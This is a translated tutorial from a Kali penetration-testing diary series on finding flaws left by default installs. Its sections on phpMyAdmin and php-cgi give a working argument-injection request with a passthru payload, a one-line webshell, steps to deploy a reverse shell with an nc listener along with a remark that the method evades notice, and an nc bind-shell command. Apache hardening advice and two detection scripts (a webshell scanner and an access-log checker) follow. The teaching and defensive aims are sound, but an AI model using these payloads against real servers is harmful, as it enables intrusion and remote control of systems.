Manual vulnerability mining
That is, after a scan, how to verify the vulnerability alerts it reports.
# Default installation
The notion that Linux is more secure than Windows comes from the fact that a default Windows installation enables many services and unnecessary ports, is not configured with strict security settings, and often runs system services with the highest privileges.
Vulnerability type: remote command execution
1. phpMyAdmin
A web interface installed on a web server for managing MySQL databases. In earlier versions, if no security configuration was done after installation and the sensitive paths were left in place, a security risk remained; the most obvious one is the setup directory.
A. Check whether the PHP website (identifiable from the banner and similar information) has an accessible phpMyAdmin directory (scanning tool / manual crawling).
# If it is protected by a username and password, brute-forcing can be attempted
B. Try whether the /phpmyadmin/setup directory is accessible: "the server can be configured without any authentication".
# From a security best-practice perspective: do not allow access to the phpMyAdmin directory from the public network, or disable access to the setup directory.
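As an added example, not from the original post, here is how the best-practice note above looks in Apache 2.4 configuration for a Debian-style phpMyAdmin package. The /usr/share/phpmyadmin path and the 10.0.0.0/8 management network are assumptions; adjust them to the real install.

```apache
# Weak (typical package default): the alias publishes the whole phpMyAdmin tree,
# including setup/, to every client that can reach the web server.
# (Example configuration; paths and the address range are assumptions.)
Alias /phpmyadmin /usr/share/phpmyadmin

# Hardened: keep the alias, but only accept clients from the management network ...
<Directory /usr/share/phpmyadmin>
    Require ip 10.0.0.0/8
</Directory>

# ... and never serve the setup directory at all, whatever the client address.
<Directory /usr/share/phpmyadmin/setup>
    Require all denied
</Directory>
```

The Alias line by itself is the weak state; adding the two Directory blocks produces the hardened one. After reloading Apache, a request for /phpmyadmin/setup/ from any address should return 403. On Apache 2.2 the equivalent directives are Order deny,allow, Deny from all and Allow from 10.0.0.0/8.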
C. Early phpMyAdmin vulnerability: "a PHP page can be executed by editing or customizing the directives sent in the URL".
For example:
POST http://192.168.20.10/phpMyAdmin/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1   # modifies the server's php.ini
Host: 192.168.20.10

<?php
passthru('id');
die();   # the statements after this are not executed, which suppresses miscellaneous output such as the HTML returned by the server
?>
# Editing a configuration directive modifies php.ini, after which the PHP page can call any function ("callable system function, passthru()").
# The user account running the web server process is usually restricted to an ordinary account such as www-data; full control of the server requires privilege escalation.
Replay with Burp Suite
# With www-data rights you can run ls, cat and similar commands ("pwd: view the current path; cat /etc/passwd: view user accounts")
# Search the PHP files for hardcoded account credentials
# Try to write a web Trojan (webshell) to control the server
Note: the scanner may not detect this vulnerability; verify it manually.
D. Web Trojan (webshell)
Ready-made webshells can be found in the Kali arsenal.
Static webshell Trojan, accessed through the browser
For example: echo "<?php \$cmd = \$_GET['cmd']; system(\$cmd); ?>" > /var/www/3.php   "the simplest Trojan"
The backslash "\" prevents the shell from expanding the variables while the file is written
Execute commands in the browser: "Note: opening 3.php directly does nothing; the command must be passed after a question mark"
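Defender's counterpart to the static webshell above, added here as an example rather than taken from the post: a small scanner that walks a webroot and flags PHP files in which an execution sink (system, passthru, eval, ...) co-occurs with request input ($_GET, $_POST, ...) or with payload decoding (base64_decode, ...). It builds a constructed sample webroot in a temporary directory, containing the post's 3.php one-liner next to benign files, so it runs offline. The directory layout, file names and tag names are my own.

```python
import hashlib
import os
import re
import tempfile

# Matched case-insensitively: PHP function names are case-insensitive, so the
# post's `PassThru`/`System` spellings run just like the lowercase forms.
EXEC_FUNCS = re.compile(
    r"\b(system|passthru|shell_exec|exec|popen|proc_open|eval|assert)\s*\(", re.I)
USER_INPUT = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b")
OBFUSCATION = re.compile(r"\b(base64_decode|str_rot13|gzinflate)\s*\(", re.I)


def score_source(src):
    """Return the indicator tags found in one PHP source text."""
    tags = []
    funcs = sorted({m.group(1).lower() for m in EXEC_FUNCS.finditer(src)})
    if funcs:
        tags.append("exec:" + ",".join(funcs))
    if USER_INPUT.search(src):
        tags.append("user-input")
    if OBFUSCATION.search(src):
        tags.append("obfuscation")
    return tags


def is_suspicious(tags):
    """Flag a file when an execution sink co-occurs with request input or with
    decoding of a hidden payload; a hardcoded exec() on its own is not flagged."""
    kinds = {t.split(":", 1)[0] for t in tags}
    return "exec" in kinds and bool(kinds & {"user-input", "obfuscation"})


def scan_tree(root):
    """Walk a webroot; return (relative path, tags, sha256) for suspicious PHP files."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".phtml", ".php5")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                raw = fh.read()
            tags = score_source(raw.decode("utf-8", errors="replace"))
            if is_suspicious(tags):
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                hits.append((rel, tags, hashlib.sha256(raw).hexdigest()))
    return sorted(hits)


# Constructed sample webroot (hypothetical files, not from any real site).
SAMPLE_FILES = {
    "index.php": "<?php\necho 'Welcome';\n?>\n",
    # request input reaches mail(), not a command: benign
    "contact.php": "<?php\nmail('admin@example.com', 'Contact', $_POST['message']);\n?>\n",
    # hardcoded command with no request input: a maintenance script, benign
    "admin/backup.php": "<?php\nexec('tar czf /var/backups/site.tgz /var/www/html');\n?>\n",
    # the one-liner from the post
    "3.php": "<?php $cmd = $_GET['cmd']; system($cmd); ?>\n",
    # eval of a base64 blob; the constant decodes to phpinfo(); (constructed, harmless)
    "uploads/avatar.php": "<?php eval(base64_decode('cGhwaW5mbygpOw==')); ?>\n",
}


def build_sample_webroot():
    """Write SAMPLE_FILES into a fresh temp directory and return its path."""
    root = tempfile.mkdtemp(prefix="webroot-")
    for rel, body in SAMPLE_FILES.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for rel, tags, digest in scan_tree(build_sample_webroot()):
        print(f"{rel}: {' '.join(tags)} sha256={digest[:16]}...")
```

Run it against the real document root (scan_tree("/var/www")) and compare the hash column with a baseline taken at deployment time; a flagged file that is not in the baseline is the first thing to triage. The co-occurrence rule keeps the hardcoded exec() in admin/backup.php and the mail() form in contact.php out of the results, which is what separates this from a plain grep for system(.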
Reverse shell: "submit a request (containing a reverse shell)"
# The account will generally still be an ordinary user. Kali ships various types of shells:
root@kali:/usr/share/webshells# ls
asp  aspx  cfm  jsp  perl  php
root@kali:/usr/share/webshells# cd php
root@kali:/usr/share/webshells/php# ls
findsock.c        php-findsock-shell.php  qsd-php-backdoor.php
php-backdoor.php  php-reverse-shell.php   simple-backdoor.php
root@kali:/usr/share/webshells/php# cp php-reverse-shell.php /root/3.php
# Change the IP address in the shell that the reverse connection goes back to
# Use nc to listen on the reverse-connection port 1234 (the TAB key does not work in the nc terminal)
# Copy and paste the shell code into the POST body and send it. "This method is relatively hidden and not easy to discover."
# When some commands, such as ifconfig, cannot be used
2. CGI module ("Ubuntu/Debian install php5-cgi by default")
# /cgi-bin/php5 and /cgi-bin/php can be accessed directly (these directories usually cannot be crawled, because they are not under /var/www)
# Custom-encoded shellcode
# Make the server open a port, then connect to it with nc to get a shell
<?php
echo system('mkfifo /tmp/pipe; sh /tmp/pipe | nc -nlp 4444 > /tmp/pipe');
?>
# If there is a firewall, you need to make sure that the firewall allows the connection
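Detection view of section C (the -d directives sent in the URL) and of section 2 (direct requests to the CGI interpreter), added here as an example; it is not code from the original post. It parses Apache combined-format access-log lines (a constructed sample is embedded) and raises three alert tags: any request under phpMyAdmin's setup/ directory, a query string that decodes to something starting with a dash (a CGI query string with no unencoded "=" is passed to php-cgi as command-line switches, which is how the -d directives above reach php.ini), and direct requests to /cgi-bin/php or /cgi-bin/php5. It generalizes beyond the page's -d form: any leading-dash switch is flagged. Function names and tag strings are my own.

```python
import re
from urllib.parse import unquote, unquote_plus

# Combined-log format: client, identity, user, [timestamp], "METHOD target HTTP/x", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log using RFC 5737 test addresses; not real traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.11 - - [10/Oct/2023:13:55:40 +0000] "GET /phpmyadmin/setup/index.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
192.0.2.12 - - [10/Oct/2023:13:56:01 +0000] "POST /phpMyAdmin/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1" 200 80 "-" "curl/7.88.1"
192.0.2.13 - - [10/Oct/2023:13:56:05 +0000] "GET /cgi-bin/php5 HTTP/1.1" 404 200 "-" "Mozilla/5.0"
192.0.2.14 - - [10/Oct/2023:13:56:09 +0000] "GET /search.php?q=allow_url_include HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Split one access-log line into fields; return None for unparsable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    path, _, query = rec["target"].partition("?")
    rec["path"] = unquote(path).lower()   # decode %xx and normalise case (phpMyAdmin vs phpmyadmin)
    rec["query"] = unquote_plus(query)    # '+' is a space inside a query string
    return rec


def classify(rec):
    """Return alert tags for one parsed request (empty list means nothing notable)."""
    alerts = []
    if re.search(r"/phpmyadmin/setup(/|$)", rec["path"]):
        alerts.append("phpmyadmin-setup-access")
    # A decoded query string that begins with '-' is a command-line switch for
    # php-cgi, whatever follows it; the keyword (allow_url_include, -d, ...)
    # alone is not the signal, its position is.
    if rec["query"].lstrip().startswith("-"):
        alerts.append("php-cgi-argument-injection")
    if re.search(r"/cgi-bin/php\d*(/|$)", rec["path"]):
        alerts.append("direct-php-cgi-request")
    return alerts


def scan(lines):
    """Return (client, status, request target, tags) for every line that raises an alert."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        tags = classify(rec)
        if tags:
            hits.append((rec["ip"], rec["status"], rec["target"], tags))
    return hits


if __name__ == "__main__":
    for ip, status, target, tags in scan(SAMPLE_LOG.splitlines()):
        print(f"{ip} {status} {target}\n    -> {', '.join(tags)}")
```

Feed it the real log with scan(open("/var/log/apache2/access.log")). A 404 on /cgi-bin/php5 is still reported, because the attempt matters more than the outcome, and the benign search request whose parameter value happens to contain allow_url_include is not reported, because its decoded query does not begin with a dash.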
Newbie Diary 35: Kali penetration testing - web penetration - manual vulnerability mining (i) - vulnerabilities caused by default installation